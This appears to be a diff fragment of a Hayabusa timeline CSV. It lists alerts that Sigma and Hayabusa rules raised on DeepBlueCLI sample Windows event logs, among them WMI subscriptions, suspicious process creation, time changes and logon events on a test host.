+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:28.619 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:10:53.299 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x25519  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2553c  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\lsass.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x15f53a  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x15f546  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xdad4  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xdafc  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x4bafc  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x4bb14  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xd99e  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xd9c6  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: -  :  Process: C:\Windows\System32\svchost.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: -  :  Port: -  :  LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x16559  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x16589  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
